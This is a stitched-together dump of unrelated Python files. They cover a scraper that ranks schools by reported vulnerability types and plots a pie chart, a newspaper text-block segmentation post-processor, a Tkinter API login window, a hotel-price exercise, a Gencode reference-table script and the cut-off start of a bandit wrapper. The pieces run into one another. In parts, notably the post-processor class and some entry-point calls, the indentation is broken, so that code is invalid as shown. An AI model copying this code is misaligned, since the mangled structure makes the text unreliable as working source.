                    name = re.findall(r'(.*["学"|"院"|"厅"|"部"|"会"|"司"|"局"|"区"|"T"|"馆"|"他"|"心"])', datas[times][0])[0]  # extract the school name by its trailing character
                except Exception as e:
                    # NOTE(review): on a failed match, `name` keeps its value
                    # from the PREVIOUS row, so this row is credited to the
                    # wrong school -- verify intent.
                    print(datas[times][0])
                edu_dic.setdefault(name, {})
                edu_dic[name].setdefault(datas[times][2].rstrip('\n'), 0)
                edu_dic[name][datas[times][2].rstrip('\n')] += 1
                times += 1
            else:
                continue
    for k_1, v_1 in edu_dic.items():  # total vulnerability count per school
        v_1["总数"] = 0
        for k_2 in v_1.keys():
            if "总数" == k_2:
                continue
            else:
                v_1["总数"] += v_1[k_2]
    edu_dic_new = sorted(edu_dic, key=lambda x: edu_dic[x]["总数"], reverse=True)
    for k_3, v_3 in submitter_dic.items():  # total vulnerability count per submitter
        v_3["总数"] = 0
        for k_4 in v_3.keys():
            if "总数" == k_4:
                continue
            else:
                v_3["总数"] += v_3[k_4]
    # NOTE(review): edu_dic_new is recomputed identically here -- redundant.
    edu_dic_new = sorted(edu_dic, key=lambda x: edu_dic[x]["总数"], reverse=True)
    submitter_dic_new = sorted(submitter_dic, key=lambda x: submitter_dic[x]["总数"], reverse=True)
    for edu in edu_dic_new:  # rebuild the module-level dicts in ranked order
        edu_index_dic[edu] = edu_dic[edu]
    for submitter in submitter_dic_new:
        submitter_index_dic[submitter] = submitter_dic[submitter]
    return datas, submitter_index_dic, edu_index_dic
# Translate the requested year into a crawl offset and run the pipeline.
def processYear(year):
    """Crawl the page range that corresponds to *year*, then analyze it."""
    start_pages = {"2021": 1, "2020": 3000, "2019": 5000}
    offset = start_pages.get(year, 7000)  # any other year falls back to 7000
    print("正在爬取{0}年数据......".format(year))
    Pr(getData, offset)
    print("数据采集完毕, 请选择下一步操作......")
    processFinish()
# Pipeline run after the crawl: analyze, rank, tally and plot.
def processFinish():
    print("正在处理数据并进行分析可视化......")
    process()
    print("对edu大学|提交者进行排名分析并写进txt文件......")
    # Write the per-school / per-submitter rankings to txt files.
    edu_submitter_rank(datas, edu_index_dic, submitter_index_dic)
    print("数据写入文件完成.......")
    print("处理完毕,统计各类型漏洞数据......")
    # Count each vulnerability category (fills the global dic_bug).
    Tongji_bug(datas)
    print("统计完毕,进行漏洞类型画饼图可视化......")
    Huatu(dic_bug)
# Rank schools and submitters per bug category and write the breakdowns to txt.
def edu_submitter_rank(datas, edu_index_dic, submitter_index_dic):
    # Ensure every bug-category key exists before counting.
    for bug in bug_name:
        for index_edu in edu_index_dic.keys():
            edu_index_dic[index_edu].setdefault(bug, 0)
        for index_submitter in submitter_index_dic.keys():
            submitter_index_dic[index_submitter].setdefault(bug, 0)
    for i in datas:
        name = re.findall(r'(.*["学"|"院"|"厅"|"部"|"会"|"司"|"局"|"区"|"T"|"馆"|"他"|"心"])', i[0])[0]  # school name, same pattern as process()
        submitter = i[1]
        for j in bug_name:
            if j in i[0]:
                edu_index_dic[name][j] += 1
                submitter_index_dic[submitter][j] += 1
    with open('edu_rank.txt', 'w+', encoding='utf-8') as f, open('submitter_rank.txt', 'w+', encoding='utf-8') as f1:
        for i in edu_index_dic.keys():
            f.write(str(i) + '\n')
            for j in edu_index_dic[i]:
                f.write('\t' + str(j) + ":" + str(edu_index_dic[i][j]) + "个" + '\n')
        for k in submitter_index_dic.keys():
            f1.write(str(k) + '\n')
            for l in submitter_index_dic[k]:
                f1.write('\t' + str(l) + ":" + str(submitter_index_dic[k][l]) + "个" + '\n')
# Tally how many scraped reports mention each vulnerability category.
def Tongji_bug(datas):
    """Count bug categories over the rows into the global dic_bug (ranked)."""
    global dic_bug
    dic_bug = {"SQL": 0, "CSRF": 0, "SSRF": 0, "XSS": 0, "代码执行": 0, "其他": 0, "命令执行": 0, "垂直权限": 0, "弱口令": 0, "敏感信息": 0, "文件上传": 0, "水平权限": 0, "点击劫持": 0}
    for row in datas:
        for label in bug_name:
            if label in row[0]:
                dic_bug[label] += 1
    dic_bug = dict(sorted(dic_bug.items(), key=lambda item: item[1], reverse=True))
# Visualize the ranked vulnerability-type counts as a pie chart.
def Huatu(data):
    # Flatten the dict into parallel value/label lists.
    data_list, label_list = [], []
    for k, v in data.items():
        data_list.append(v)
        label_list.append(k)
    title = "2020-2021年教育业漏洞排行榜"
    plt.figure(figsize=(15, 15))
    # Use a font that can render the Chinese labels.
    plt.rcParams['font.family'] = 'SimHei'
    # Detach (explode) the smaller slices from position 6 onward.
    explode = [0, 0, 0, 0, 0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5]
    # Custom slice colors.
    colors = ['silver', 'cyan', 'khaki', 'pink', 'magenta', 'darkseagreen', 'm', 'teal', 'skyblue', 'tomato', 'green', 'yellowgreen', 'lime']
    # colors = ['red', 'pink', 'magenta', 'purple', 'orange']
    # Normalize both axes so the pie is a circle rather than an ellipse.
    plt.axes(aspect='equal')
    # Fix the X/Y ranges (these control the pie's center and radius below).
    plt.xlim(0, 12)
    plt.ylim(0, 12)
    # Hide the plot frame.
    plt.gca().spines['right'].set_color('none')
    plt.gca().spines['top'].set_color('none')
    plt.gca().spines['left'].set_color('none')
    plt.gca().spines['bottom'].set_color('none')
    # Draw the pie chart.
    plt.pie(x=data_list,  # slice values
            labels=label_list,  # category labels
            explode=explode,  # which slices to detach
            colors=colors,  # custom fill colors
            autopct='%0.1f%%',  # percentage format, one decimal place
            pctdistance=0.8,  # distance of percentage labels from the center
            labeldistance=1.1,  # distance of category labels from the center
            startangle=180,  # initial rotation of the pie
            center=(6, 5),  # pie center in axis coordinates
            radius=6,  # pie radius in axis coordinates
            counterclock=False,  # draw clockwise
            wedgeprops={'linewidth': 1, 'edgecolor': 'red'},  # wedge border style
            textprops={'fontsize': 11, 'color': 'black'},  # label text style
            frame=1)  # draw the surrounding axes frame
    # Hide the X/Y tick values.
    plt.xticks(())
    plt.yticks(())
    # Add the title and show the figure.
    plt.title(title)
    plt.show()
def main():
    # Interactive entry point: optionally crawl a chosen year, then analyze.
    userChooes = input("是否需要进行数据爬取(y|n):")
    if userChooes == "y":
        chooesYear = input("请输入要爬取的年份:")
        processYear(chooesYear)
        # NOTE(review): processYear() -> processFinish() already ran process();
        # calling it again re-reads the file and double-appends to `datas` --
        # confirm whether this second call is intentional.
        process()
    elif userChooes == "n":
        processFinish()
    else:
        # NOTE(review): the prompt accepts lowercase 'y' but this message
        # mentions 'Y' -- cosmetic inconsistency in the user-facing text.
        print("错误!请输入'Y'或者'n'")
if __name__ == "__main__":
main() |
import logging
import os
import cv2
import matplotlib.pyplot as plt
import numpy as np
from citlab_python_util.geometry.rectangle import Rectangle
from citlab_python_util.image_processing.image_stats import get_rotation_angle
from scipy.ndimage import interpolation as inter
# Module logger; INFO level is enabled for post-processor progress messages.
logger = logging.getLogger("TextBlockNetPostProcessor")
# logging.basicConfig(level=logging.WARNING)
logging.basicConfig(level=logging.INFO)

# Presumably: minimum separator distance as a fraction of the image size, and
# a cap on region-splitting recursion -- both used by code past this chunk;
# TODO confirm against the rest of the file.
MIN_PIXEL_SEPARATOR_DISTANCE_FACTOR = 0.003
MAX_RECURSION_DEPTH = 4
class TextBlockNetPostProcessor(object):
"""Comments / Workflow:
1.) the original image is used to calculate the rotation angle of the image -> better way to do this?
2.) the text block channel of the net output is used to calculate white runs in the image, i.e. separator
3.) the separator channel of the net output is used to extract visible separator from the image
4.) 2.) & 3.) are combined to provide a first partition into coarse regions (the number of columns should be visible)
5.) Iterate over the regions from the last step and use the separator and text block channel to provide more horizontal separator
6.) The resulting grid-like image can be used to divide the Page into text regions
won't work well for pages with
- images, since no image detection is provided for now -> coming
- complex layout, e.g. many advertisments -> check
"""
def __init__(self, original_image, text_block_outline, text_block, separator):
self.images = {'original_image': original_image, 'text_block_outline': text_block_outline,
'text_block': text_block, 'separator': separator,
'binarized_image': self.binarize_image(original_image),
'empty_image': np.zeros(original_image.shape, dtype=np.uint8)}
if not self.check_dimensions(*self.images.values()):
raise RuntimeError("Image shapes don't match.")
self.image_height, self.image_width = self.images['original_image'].shape
@staticmethod
def binarize_net_output(image, threshold):
return np.array((image > threshold), np.int32)
@staticmethod
def binarize_image(image, gaussian_blur=True):
if gaussian_blur:
res = cv2.GaussianBlur(image, (5, 5), 0)
else:
res = image
_, res = cv2.threshold(res, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return res
def get_best_rotation_angle(self):
rotation_angle_binarized_image = get_rotation_angle(self.images['binarized_image'])[1]
rotation_angle_textblock_image = get_rotation_angle(self.images["text_block"])[1]
print(f"Rotation angle determined by the binarized image: {rotation_angle_binarized_image}")
print(f"Rotation angle determined by the text block image: {rotation_angle_textblock_image}")
return rotation_angle_binarized_image
# return get_rotation_angle(self.images['binarized_image'])[1]
@staticmethod
def check_dimensions(*images):
return all(image.shape == images[0].shape for image in images)
def rotate_images(self, angle):
    """Rotate every working image in place by `angle` degrees.

    Uses nearest-neighbour interpolation (order=0) and keeps the original
    shape (reshape=False) so all channels stay pixel-aligned.
    """
    logger.info(f"Rotate images by {angle} degrees.")
    for img_name, img in self.images.items():
        self.images[img_name] = inter.rotate(img, angle, reshape=False, order=0)
@staticmethod
def get_separators(image, mode='horizontal', threshold=0.1):
    """Find white-run separators in `image`.

    Sums the pixel values across the x or y dimension (depending on
    `mode`) and reports every row/column whose relative white coverage
    exceeds `threshold`. Invert the image first to look for black runs.

    :param image: input image (white pixels are 255)
    :param mode: 'horizontal' (0) or 'vertical' (1)
    :param threshold: relative coverage a row/column must exceed
    :return: list of (index, relative score) tuples
    :raises ValueError: if `mode` is not one of the accepted values
    """
    # Accept the string aliases for the two modes (isinstance instead of
    # the former `type(mode) == str` comparison).
    if isinstance(mode, str):
        if mode.lower() == 'horizontal':
            mode = 0
        elif mode.lower() == 'vertical':
            mode = 1
    if mode not in (0, 1):
        raise ValueError("Provide a proper mode, possible options are 'horizontal' (0) or 'vertical' (1).")
    image_height, image_width = image.shape[:2]
    if mode == 0:
        # Row sums, normalized by 255 so the profile counts white pixels.
        profiles = np.sum(image, axis=1) / 255
        norm = image_width
    else:
        profiles = np.sum(image, axis=0) / 255
        norm = image_height
    return [(i, p / norm) for i, p in enumerate(profiles) if p / norm > threshold]
# def get_separators(self, threshold_horizontal=0.1, threshold_vertical=0.5):
#
# height, width = self.images['text_block'].shape
#
# horizontal_profiles = np.sum(self.images['text_block'], axis=1) / 255
# vertical_profiles = np.sum(self.images['text_block'], axis=0) / 255
#
# # We check for '<', because we search for blackruns in the textblock netoutput!
# horizontal_separators = [(i, hp / width) for i, hp in enumerate(horizontal_profiles) if
# hp / width < threshold_horizontal]
# vertical_separators = [(i, vp / height) for i, vp in enumerate(vertical_profiles) if
# vp / height < threshold_vertical]
#
# print(len(horizontal_separators))
# print(horizontal_separators)
# print(len(vertical_separators))
# print(vertical_separators)
#
# return horizontal_separators, vertical_separators
def run_recursion(self, region_rectangle: Rectangle, max_recursion_depth=MAX_RECURSION_DEPTH, mode="horizontal", threshold=0.9):
    """ Run recursion to determine the text regions. Make sure to alternate between horizontal and vertical
    separator detection. The `mode` parameter determines with which subdivision to start, defaults to 'horizontal'.

    :param region_rectangle: determines the region in the original text block image
    :param threshold: relative number of white pixels that should be reached to be defined as a white run.
    :param mode: same parameter as in method `get_separators`, 'horizontal' or 'vertical'.
    :param max_recursion_depth: maximal number of times to run the recursion
    :return: a mask that can be applied to the baseline detection output to get a division into text regions
    """
    print(MAX_RECURSION_DEPTH - max_recursion_depth)  # current recursion level (debug)
    if max_recursion_depth == 0:
        return
    image = self.images["text_block"]
    # BUG FIX: crop rows by y/height and columns by x/width in ONE 2-D
    # subscript. The previous chained form image[x:x+w][y:y+h] sliced the
    # rows twice and never restricted the columns at all.
    image = image[region_rectangle.y: region_rectangle.y + region_rectangle.height,
                  region_rectangle.x: region_rectangle.x + region_rectangle.width]
    # The min_pixel_separator_distance determines up to which (pixel)distance neighboring white runs get merged!
    min_pixel_separator_distance = int(self.image_height * MIN_PIXEL_SEPARATOR_DISTANCE_FACTOR)
    print(f"min_pixel_separator_distance = {min_pixel_separator_distance}")
    # Look for black runs in the text block channel by inverting it.
    profile_list = self.get_separators(255 - image, mode, threshold)
    index_separators = [i for i, _ in profile_list]
    if not index_separators:
        return
    # Convert separator positions into (start, end) ranges of the regions
    # between them, dropping gaps shorter than min_pixel_separator_distance.
    index_separators_new = []
    if index_separators[0] > min_pixel_separator_distance:
        index_separators_new.append((0, index_separators[0]))
    for i in range(len(index_separators) - 1):
        if index_separators[i + 1] - index_separators[i] > min_pixel_separator_distance:
            index_separators_new.append((index_separators[i] + 1, index_separators[i + 1]))
    # NOTE(review): the trailing-region checks compare against the FULL
    # image size rather than the current region's size — confirm intended.
    if mode == 'horizontal':
        if (self.image_height - 1) - index_separators[-1] > min_pixel_separator_distance:
            index_separators_new.append((index_separators[-1], self.image_height - 1))
    elif mode == 'vertical':
        if (self.image_width - 1) - index_separators[-1] > min_pixel_separator_distance:
            index_separators_new.append((index_separators[-1], self.image_width - 1))
    # Alternate the split direction on the next recursion level.
    new_mode = None
    if mode == "horizontal":
        new_mode = "vertical"
    elif mode == "vertical":
        new_mode = "horizontal"
    new_region_rectangle = None
    for image_range in index_separators_new:
        if mode == "horizontal":
            # update the y-coordinates and keep the x-coordinates
            new_y = image_range[0] + region_rectangle.y
            new_height = image_range[1] - image_range[0]
            new_region_rectangle = Rectangle(region_rectangle.x, new_y, region_rectangle.width, new_height)
        elif mode == "vertical":
            # update the x-coordinates and keep the y-coordinates
            new_x = image_range[0] + region_rectangle.x
            new_width = image_range[1] - image_range[0]
            new_region_rectangle = Rectangle(new_x, region_rectangle.y, new_width, region_rectangle.height)
        print("REGION RECTANGLE COORD: ", new_region_rectangle.get_vertices())
        # Draw the found region onto the (initially black) canvas.
        cv2.rectangle(self.images["empty_image"], new_region_rectangle.get_vertices()[0], new_region_rectangle.get_vertices()[2], (255, 0, 0), 1)
        # Relax the threshold while descending, but never below 0.65.
        self.run_recursion(new_region_rectangle, max_recursion_depth - 1, new_mode, max(0.9 * threshold, 0.65))
    return new_region_rectangle
def run(self):
    """Deskew the images, run the recursive region split and display the result."""
    rotation_angle = round(self.get_best_rotation_angle(), 4)
    self.rotate_images(rotation_angle)
    # Start the recursion on the full page.
    region_rectangle_image = Rectangle(0, 0, self.image_width, self.image_height)
    self.run_recursion(region_rectangle_image, threshold=0.9)
    # Show the drawn region rectangles next to the net output and the page.
    plt.set_cmap('gray')
    plt.subplot(1, 3, 1)
    plt.imshow(self.images["empty_image"])
    plt.subplot(1, 3, 2)
    plt.imshow(self.images["text_block"])
    plt.subplot(1, 3, 3)
    plt.imshow(self.images["original_image"])
    plt.show()
if __name__ == '__main__':
    # Demo: run the post processor on one ONB newspaper page and its three
    # net output channels (OUT0: text block outline, OUT1: text block,
    # OUT2: separator).
    path_to_image_folder = '/home/max/devel/projects/python/article_separation/data/test_post_processing/textblock/'
    path_to_orig_image = os.path.join(path_to_image_folder, 'ONB_aze_19110701_004.jpg')
    path_to_tb_outline = os.path.join(path_to_image_folder, 'ONB_aze_19110701_004_OUT0.jpg')
    path_to_tb = os.path.join(path_to_image_folder, 'ONB_aze_19110701_004_OUT1.jpg')
    path_to_separator = os.path.join(path_to_image_folder, 'ONB_aze_19110701_004_OUT2.jpg')
    orig_image = cv2.imread(path_to_orig_image, cv2.IMREAD_UNCHANGED)
    tb_outline_image = cv2.imread(path_to_tb_outline, cv2.IMREAD_UNCHANGED)
    tb_image = cv2.imread(path_to_tb, cv2.IMREAD_UNCHANGED)
    separator_image = cv2.imread(path_to_separator, cv2.IMREAD_UNCHANGED)
    # NOTE(review): only the original image is resized here, but the
    # constructor requires matching shapes — presumably the net output
    # files on disk already have the scaled size; confirm.
    orig_image = cv2.resize(orig_image, None, fx=0.4, fy=0.4)
    # orig_image_gb = cv2.GaussianBlur(orig_image, (5, 5), 0)
    orig_image_gb = orig_image
    _, orig_image_gb_bin = cv2.threshold(orig_image_gb, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    tb_pp = TextBlockNetPostProcessor(orig_image_gb_bin, tb_outline_image, tb_image, separator_image)
    region_rectangle_image = Rectangle(0, 0, orig_image.shape[1], orig_image.shape[0])
    # tb_pp.run_recursion(region_rectangle_image)
    #
    # text_block_rgb = cv2.cvtColor(tb_pp.images["text_block"], cv2.COLOR_BGR2RGB)
    # # text_block_rgb = tb_pp.images["text_block"]
    # plt.imshow(text_block_rgb)
    # plt.show()
    tb_pp.run()
# # CONTOURS TEST
# original_image_rgb = cv2.cvtColor(tb_pp.images["original_image"], cv2.COLOR_BGR2RGB)
# text_block_image_rgb = cv2.cvtColor(tb_pp.images["text_block"], cv2.COLOR_BGR2RGB)
# plt.subplot(1, 2, 1)
# plt.imshow(text_block_image_rgb)
# contours, _ = cv2.findContours(tb_pp.images["text_block"], cv2.RETR_CCOMP, cv2.CHAIN_APPROX_NONE)
# contour_image = cv2.drawContours(text_block_image_rgb, contours, -1, (0, 255, 0), 3)
# plt.subplot(1, 2, 2)
# plt.imshow(text_block_image_rgb)
# plt.show()
# rotation_angle = round(tb_pp.get_best_rotation_angle(), 4)
# tb_pp.rotate_images(rotation_angle)
#
# horizontal_profile_list, vertical_profile_list = tb_pp.get_separators()
#
# index_horizontal = [i for i, _ in horizontal_profile_list]
# index_vertical = [i for i, _ in vertical_profile_list]
#
# white_sep = np.zeros(orig_image.shape, dtype=np.uint8)
# white_sep[:, index_vertical] = 255
# white_sep[index_horizontal, :] = 255
# # white_sep = cv2.resize(white_sep, None, fx=0.5, fy=0.5)
#
# # separator_image = cv2.resize(separator_image, None, fx=0.5, fy=0.5)
# separator_image = np.array((separator_image > 0.2), np.uint8)
# print(separator_image, separator_image.dtype)
# separator_image *= 255
#
# print(separator_image, separator_image.dtype)
# print(white_sep, white_sep.dtype)
#
# add_condition = np.not_equal(white_sep, separator_image)
# black_white_separator = np.copy(white_sep)
# black_white_separator[add_condition] += separator_image[add_condition]
#
# kernel = np.ones((5, 5), np.uint8)
# black_white_separator = cv2.morphologyEx(black_white_separator, cv2.MORPH_CLOSE, kernel)
#
# plt.set_cmap("gray")
# plt.subplot(1, 4, 1)
# plt.imshow(white_sep)
# plt.subplot(1, 4, 2)
# plt.imshow(separator_image)
# plt.subplot(1, 4, 3)
# plt.imshow(black_white_separator)
# plt.subplot(1, 4, 4)
# plt.imshow(orig_image)
# plt.show()
#
# # cv2.imshow('white separator', white_sep)
# # cv2.imshow('black separator net', separator_image)
# # cv2.imshow('black white separator', black_white_separator)
# # cv2.waitKey(0)
# # cv2.destroyAllWindows()
#
# vertical_profile = np.sum(black_white_separator, axis=0)
# horizontal_profile = np.sum(black_white_separator, axis=1)
#
# horizontal = [(i, hp / orig_image.shape[1] / 255) for i, hp in enumerate(horizontal_profile) if
# hp / orig_image.shape[1] / 255 < 0.2]
# vertical = [(i, vp / orig_image.shape[0] / 255) for i, vp in enumerate(vertical_profile) if
# vp / orig_image.shape[0] / 255 < 0.2]
#
# horizontal_index = [i for i, _ in horizontal]
# vertical_index = [i for i, _ in vertical]
#
# print(horizontal_index)
# print(vertical_index)
#
#
# def convert_to_ranges(index_list):
# range_list = []
# skip = False
# for i in range(len(index_list) - 1):
# if not skip:
# begin = index_list[i]
# if index_list[i + 1] - index_list[i] < 3:
# skip = True
# continue
# skip = False
# end = index_list[i]
# range_list.append((begin, end))
# return range_list
#
#
# print(convert_to_ranges(horizontal_index))
# print(convert_to_ranges(vertical_index))
#
# # tb_image_binarized = np.array((tb_image > 0.8), np.uint8) * 255
# # print(tb_image_binarized)
# # # erosion_kernel = np.array([[0, 1, 0], [0, 1, 0], [0, 1, 0]], dtype=np.uint8)
# # erosion_kernel = np.ones([8, 8], dtype=np.uint8)
# # print(erosion_kernel)
# # tb_image_erosion = cv2.erode(tb_image_binarized, erosion_kernel, iterations=1)
# # tb_image_erosion = cv2.resize(tb_image_erosion, None, fx=0.4, fy=0.4)
# # print(tb_image_erosion)
# # cv2.imshow("erosion image textblock", tb_image_erosion)
# # cv2.waitKey(0)
# # cv2.destroyAllWindows()
# # exit(1)
|
import sys
import requests
from chooseplayer import *

# Version-dependent Tk import. BUG FIX: on Python 3 the message box module
# is `tkinter.messagebox`; importing `tkMessageBox` (the Python 2 name)
# raised ImportError and prevented startup.
if sys.version_info[0] < 3:
    import Tkinter as Tk
    import ttk
else:
    import tkinter as Tk
    from tkinter import ttk, messagebox

API_BASE_URL = "https://mocktesisasobiguaapi.azurewebsites.net/v1"
# API_BASE_URL = "https://localhost:5001/v1"
HEADER = {"Content-Type": "application/json", "Accept": "*"}
class Login():
    """Tkinter login window for the CDAG - ASOBIGUA client."""

    def __init__(self):
        """Build the login form and enter the Tk main loop (blocks)."""
        self.root = Tk.Tk()
        self.root.title("CDAG - ASOBIGUA")
        lbl = Tk.Label(self.root, text="Usuario:")
        lbl.grid(row=0, column=0)
        self.txbUsername = Tk.Entry(self.root)
        self.txbUsername.grid(row=0, column=1)
        lbl = Tk.Label(self.root, text="Password:")
        lbl.grid(row=1, column=0)
        self.txbPassword = Tk.Entry(self.root, show="*")
        self.txbPassword.grid(row=1, column=1)
        self.loginButton = Tk.Button(self.root, text="Iniciar sesion", command=self.login)
        self.loginButton.grid(row=2, column=1)
        self.lblLoginResult = Tk.Label(self.root)
        self.lblLoginResult.grid(row=3, column=1)
        Tk.mainloop()

    def api_url(self, url):
        """Return the absolute API URL for a relative path (logged for debugging)."""
        s = "%s%s" % (API_BASE_URL, url)
        print(s)
        return s

    def login(self):
        """Authenticate with the entered credentials.

        On success the window is destroyed; trainer accounts additionally
        get a player selection dialog.
        """
        import json

        username = self.txbUsername.get()
        password = self.txbPassword.get()
        # BUG FIX: the body must be real JSON. str() on a dict produced a
        # single-quoted Python repr, which a JSON API rejects despite the
        # application/json content type.
        payload = json.dumps({
            "username": username,
            "password": password
        })
        response = requests.post(self.api_url("/users/login"), data=payload, headers=HEADER)
        if response.status_code != 200:
            self.lblLoginResult.config(text=response.json()['message'])
            return
        self.lblLoginResult.config(text="")
        self.trainer = response.json()
        self.root.destroy()
        if self.trainer['userType'] == 'Trainer':
            choose = ChoosePlayer(self.trainer)
            self.player = choose.player
        else:
            self.player = self.trainer
        print(self.trainer)
        print(self.player)
def main():
    """Create the login window and start the Tk event loop."""
    Login()


if __name__ == '__main__':
    main()
# Reads a month name and a number of nights, then prints the discounted
# seasonal price for an apartment and a studio.
month = input()
nights = int(input())

studio_rate = apartment_rate = 0
discount_studio = discount_apartment = 0

if month in ('May', 'October'):
    studio_rate, apartment_rate = 50, 65
    # Studio discounts only: 30% above 14 nights, 5% above 7.
    if nights > 14:
        discount_studio = 0.30
    elif nights > 7:
        discount_studio = 0.05
elif month in ('June', 'September'):
    studio_rate, apartment_rate = 75.2, 68.7
    if nights > 14:
        discount_studio = 0.2
elif month in ('July', 'August'):
    studio_rate, apartment_rate = 76, 77
    # High season: only the apartment gets a long-stay discount.
    if nights > 14:
        discount_apartment = 0.1

total_price_studio = nights * studio_rate
total_price_apartment = nights * apartment_rate
total_price_studio = total_price_studio - (total_price_studio * discount_studio)
total_price_apartment = total_price_apartment - (total_price_apartment * discount_apartment)

print(f"Apartment: {total_price_apartment:.2f} lv.")
print(f"Studio: {total_price_studio:.2f} lv.")
#!/usr/bin/env python3
"""
This module prepares reference tables for other modules
Inputs:
--------------------------------------------------------------
1. Gencode gtf file
2. Gencode fasta file
--------------------------------------------------------------
Output Tables:
-------------------------------------------------------------
1. ensg -> gene
2. isoname (transcript name) -> gene
3. ensp -> gene
4. isoform, gene, length table
5. gene -> min, max, average transcript length
6. protein coding genes
--------------------------------------------------------------
"""
# Import Modules
import pandas as pd
import argparse
import csv
import os
from collections import defaultdict
import gtfparse
# Define Functions
def GenMap(gtf_file, results):
    """Build gene/transcript/protein mapping tables from a Gencode GTF file.

    Writes four tab-separated files (paths taken from `results`):
    ensg -> gene, enst -> transcript name (isoname), gene -> ensp and
    gene -> isoname.
    """
    def attribute(line, key):
        # Extract the value of `key "..."` from the GTF attribute column.
        return line.split(key + ' "')[1].split('"')[0]

    ensg_to_gene = {}                    # ENSG -> gene name
    enst_to_isoname = {}                 # ENST -> transcript name
    gene_to_ensps = defaultdict(set)     # gene name -> set of ENSPs
    gene_to_isonames = defaultdict(set)  # gene name -> set of transcript names

    with open(gtf_file) as gtf:
        for line in gtf:
            if line.startswith('#'):
                continue
            feature = line.split('\t')[2]
            if feature == 'transcript':
                gene = attribute(line, 'gene_name')
                transcript_name = attribute(line, 'transcript_name')
                ensg_to_gene[attribute(line, 'gene_id')] = gene
                enst_to_isoname[attribute(line, 'transcript_id')] = transcript_name
                gene_to_isonames[gene].add(transcript_name)
            # Protein ids are collected from every protein-coding line,
            # independently of the feature type.
            if 'transcript_type "protein_coding' in line:
                gene_to_ensps[attribute(line, 'gene_name')].add(attribute(line, 'protein_id'))

    with open(results.ensg_gene, 'w') as ofile:
        ofile.writelines(f"{ensg}\t{gene}\n" for ensg, gene in ensg_to_gene.items())
    with open(results.enst_isoname, 'w') as ofile:
        ofile.writelines(f"{enst}\t{isoname}\n" for enst, isoname in enst_to_isoname.items())
    with open(results.gene_ensp, 'w') as ofile:
        ofile.writelines(f"{gene}\t{ensp}\n" for gene, ensps in gene_to_ensps.items() for ensp in ensps)
    with open(results.gene_isoname, 'w') as ofile:
        ofile.writelines(f"{gene}\t{iso}\n" for gene, isonames in gene_to_isonames.items() for iso in isonames)
    print("The ensg_to_gene, enst_to_isoname, ensp_to_gene and isoname_to_gene files have been prepared")
def IsoLenTab(fa_file, results):
    """Build an isoform/gene/length table from a Gencode fasta file.

    Header lines are pipe-separated; fields 4, 5 and 6 hold the isoform
    name, gene name and sequence length. Writes the table as a tsv to
    results.isoname_lens and returns it as a DataFrame.
    """
    records = []
    with open(fa_file) as fasta:
        for line in fasta:
            if not line.startswith('>'):
                continue
            fields = line.split('|')
            # The .split('""') mirrors the original parsing; it is a no-op
            # unless the field contains a literal "" sequence.
            records.append((fields[4].split('""')[0],
                            fields[5].split('""')[0],
                            int(fields[6].split('""')[0])))
    df = pd.DataFrame(records, columns=['isoform', 'gene', 'length'])
    df.to_csv(results.isoname_lens, sep='\t', index=False)
    print("The isoform length table has been prepared.")
    return df
def GeneLenTab(IsolenFile, results):
    """Write per-gene transcript length statistics (mean/min/max).

    :param IsolenFile: DataFrame with 'gene' and 'length' columns
                       (as produced by IsoLenTab)
    :param results: namespace providing the gene_lens output path
    """
    stats = (IsolenFile[['gene', 'length']]
             .groupby('gene')['length']
             .agg(['mean', 'min', 'max']))
    # Round the mean to one decimal, then turn the gene index into a column.
    stats['mean'] = stats['mean'].round(1)
    stats = stats.reset_index()
    stats.columns = ['gene', 'avg_len', 'min_len', 'max_len']
    stats.to_csv(results.gene_lens, sep="\t", index=False)
    print('Prepared the gene length statistics table')
def protein_coding_genes(results):
    """Write the unique names of all protein-coding genes to results.pc_genes."""
    annotation = gtfparse.read_gtf(results.gtf_file)
    coding = annotation[annotation['feature'] == 'gene']
    coding = coding[coding['gene_type'] == 'protein_coding']
    with open(results.pc_genes, 'w') as out:
        for name in coding['gene_name'].unique():
            out.write(f"{name}\n")
def main():
    """Parse CLI arguments and generate all reference tables."""
    # If results folder does not exist, make it
    # TODO - maybe remove
    rdir = './dump'
    if not os.path.exists(rdir):
        os.mkdir(rdir)
    # Command line arguments. (Typos fixed in the user-visible help text:
    # "Proccess" -> "Process", "Fafsa" -> "Fasta".)
    parser = argparse.ArgumentParser(description='Process ORF related file locations')
    parser.add_argument('--gtf', '-g', action='store', dest='gtf_file', help='Gencode GTF input file location')
    parser.add_argument('--fa', '-fa', action='store', dest='fa_file', help='Gencode Fasta input file location')
    parser.add_argument('--ensg_gene', '-oeg', action='store', dest='ensg_gene', help='ensg to gene output file location')
    parser.add_argument('--enst_isoname', '-oei', action='store', dest='enst_isoname', help='enst to isoname output file location')
    parser.add_argument('--gene_ensp', '-oge', action='store', dest='gene_ensp', help='Gene to ensp output file location')
    parser.add_argument('--gene_isoname', '-ogi', action='store', dest='gene_isoname', help="Gene to isoname output file location")
    parser.add_argument('--isoname_lens', '-oigl', action='store', dest='isoname_lens', help='Isoname length table output location')
    parser.add_argument('--gene_lens', '-ogls', action='store', dest='gene_lens', help='Gene Length statistics output location')
    parser.add_argument('--protein_coding_genes', '-pcg', action='store', dest='pc_genes', help='Protein Coding genes output location')
    results = parser.parse_args()
    # Make ensg -> gene, enst -> isoname, ensp -> gene and isoname -> gene mapping files
    GenMap(results.gtf_file, results)
    # Prepare Gene Isoform Length table
    df = IsoLenTab(results.fa_file, results)
    # Prepare Gene Length Table
    GeneLenTab(df, results)
    protein_coding_genes(results)


if __name__ == "__main__":
    main()
|
#!/usr/bin/env python3
from ast import literal_eval
from subprocess import Popen, PIPE, STDOUT
import hashlib
import json
import os.path
import shlex
import subprocess
import sys
binstub = "bandit3"
include_paths = ["."]

# severity converts the severity of a bandit issue to the severity
# accepted by CodeClimate. Unknown severities map to None.
_SEVERITY_MAP = {"HIGH": "major", "MEDIUM": "minor", "LOW": "info"}


def severity(sev):
    """Return the CodeClimate severity for a bandit severity string."""
    return _SEVERITY_MAP.get(sev)
if os.path.exists("/config.json"):
    contents = open("/config.json").read()
    config = json.loads(contents)

    # Select the bandit binary matching the configured python version.
    if 'config' in config:
        if config["config"].get("python_version"):
            version = config["config"].get("python_version")
            if version == "2" or version == 2:
                binstub = "bandit2"
            elif version != "3" and version != 3:
                sys.exit("Invalid python_version; must be either 2 or 3")

    # Restrict the scan to configured paths (directories or .py files only),
    # shell-quoting each one because the command runs through a shell.
    if config.get("include_paths"):
